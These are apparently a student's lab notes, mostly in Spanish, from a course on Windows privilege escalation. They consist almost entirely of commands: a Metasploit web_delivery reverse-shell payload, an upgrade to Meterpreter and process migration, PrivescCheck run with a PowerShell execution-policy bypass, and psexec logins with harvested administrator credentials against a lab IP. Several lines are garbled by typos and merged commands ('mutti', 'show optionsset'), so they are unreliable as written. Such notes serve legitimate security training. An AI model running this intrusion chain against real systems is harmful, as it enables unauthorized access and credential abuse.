Identifying Windows Privilege Escalation Vulnerabilities
Para aumentar sus privilegios en Windows, primero debe identificar las vulnerabilidades de escalada de privilegios que existen en el sistema de destino.
Este proceso variará en gran medida según el tipo de destino al que obtenga acceso. La escalada de privilegios en Windows se puede realizar mediante una gran cantidad de técnicas según la versión de Windows y la configuración única del sistema.
Este proceso puede ser bastante tedioso y consumir mucho tiempo y, como resultado, se recomienda automatizar los procesos de identificación de vulnerabilidades de escalada de privilegios. Esto se puede hacer mediante el uso de varios scripts de automatización.
PrivescCheck
PrivescCheck Este script tiene como objetivo enumerar problemas comunes de configuración de Windows que se pueden aprovechar para la escalada de privilegios locales. También recopila información diversa que puede ser útil para la explotación y/o la postexplotación.
Demo: Identifying Windows Privilege Escalation Vulnerabilities
msf5 > search web_delivery
msf5 > use 1
msf5 exploit(mutti/script/web_delivery) > show options
msf5 exploit(mutti/script/web_delivery) > show info
msf5 exploit(mutti/script/web_delivery) > set target PSH
msf5 exploit(mutti/script/web_delivery) > set payload windows/ shell/ reverse_tcp
msf5 exploit(mutti/script/web_delivery) > set PSH-EncodedCommand false
msf5 exploit(mutti/script/web_delivery) > set LHOST ethl
msf5 exploit(mutti/script/web_delivery) > exploit
# Generara una lia de comando para ejecutar en el equipo de la victima desde
# un powershell o cmd
# Una vez ejecuta preciona enter en la sesion de Metasploit
msf5 exploit(mutti/script/web_delivery) > sessions
# Ingresar a la session y ejecutarlo en segundo plano
msf5 exploit(mutti/script/web_delivery) > search shell_to
msf5 exploit(mutti/script/web_delivery) > use 0
msf5 post(mutti/manage/shelt_to_meterpreter) > show options
msf5 post(mutti/manage/shelt_to_meterpreter) > set LHOST ethl
msf5 post(mutti/manage/shelt_to_meterpreter) > set SESSION 1
msf5 post(mutti/manage/shelt_to_meterpreter) > show advance
msf5 post(mutti/manage/shelt_to_meterpreter) > set WIN_TRANSFER VBS
msf5 post(mutti/manage/shelt_to_meterpreter) > show options
msf5 post(mutti/manage/shelt_to_meterpreter) > exploit
# Tener en cuenta que levantara una sesion y se debe de ingresar a esa session
meterpreter > sysinfo
meterpreter > ps
# Migrar al explorador de windows
meterpreter > migrate 3624
# Ver los privilegios actuales
meterpreter > getuid
meterpreter > getprivs
# Transferir el powershell al equipo de la victima
meterpreter > dir
Listing: C:\Users\student\Desktop\PrivescCheck
C:\Users\student\Desktop\PrivescCheck> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# Enumera Usuario y grupos
# Privilegios del usuario actua
# Vulnerabilidades en conrtasenas
# Ver la posibilidad de ejecutar con el comando -extend
Quiz: Identifying Windows Privilege Escalation Vulnerabilities
Windows Privilege Escalation
Demo: Windows Privilege Escalation
# Segun el ejempllo aterior se encontro credenciales en CREDS > WinLogon
# Nos autenticamos por SMB con la contraseña recopilada
psexec.py Administrator@10.4.21.189
whoami
net user
whoami /privs
# Atravez de metasplot
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options
msf5 exploit(windows/smb/psexec) > show optionsset LPORT 44221
msf5 exploit(windows/smb/psexec) > show optionsset RHOSTS 10.4.21.189
msf5 exploit(windows/smb/psexec) > show optionsset SMBUser administrator
msf5 exploit(windows/smb/psexec) > show optionsset SMBPass hello 123321
msf5 exploit(windows/smb/psexec) > show optionsexploit
meterpreter > sysinfo
meterpreter > getuid